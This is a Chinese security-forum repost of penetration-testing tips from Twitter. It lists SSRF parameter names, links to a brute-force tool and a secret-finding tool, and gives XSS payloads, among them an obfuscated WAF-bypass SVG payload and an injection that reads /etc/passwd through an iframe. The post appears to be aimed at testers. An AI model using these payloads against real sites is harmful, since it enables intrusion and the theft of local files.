Twitter滲透技巧搬運工 - 網安 - 專業的網絡安全產業、社區、知識平臺

Twitter滲透技巧搬運工

VSole2022-07-19 11:56:47

SSRF常用參數

?host=?redirect=?uri=?path=?continue=?url=?window=?next=?data=?image-source=?n=?to=?follow=?u=?go=?fetch=?source=?img-src=

XSS/XXE 等攻擊的在線有效負載，以測試和檢測帶外交互

地址：https://github.com/projectdiscovery/interactsh

Tips Rxss

--><svg onload=alert(document.domain)>

shodan黑客語法

Pinkerton 是一款JavaScript 文件爬蟲和密鑰查找器

地址：https://github.com/oppsec/Pinkerton

tomcat爆破腳本工具

地址：https://github.com/oppsec/tomcter

XSS WafBypass

<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
練習地址：https://brutelogic.com.br/gym.php?p05=%3Csvg%3E%3Cset+onbegin=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb%3E
從XSS到本地文件讀取<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

撤稿糾錯

本作品采用《CC 協議》，轉載必須注明作者和本文鏈接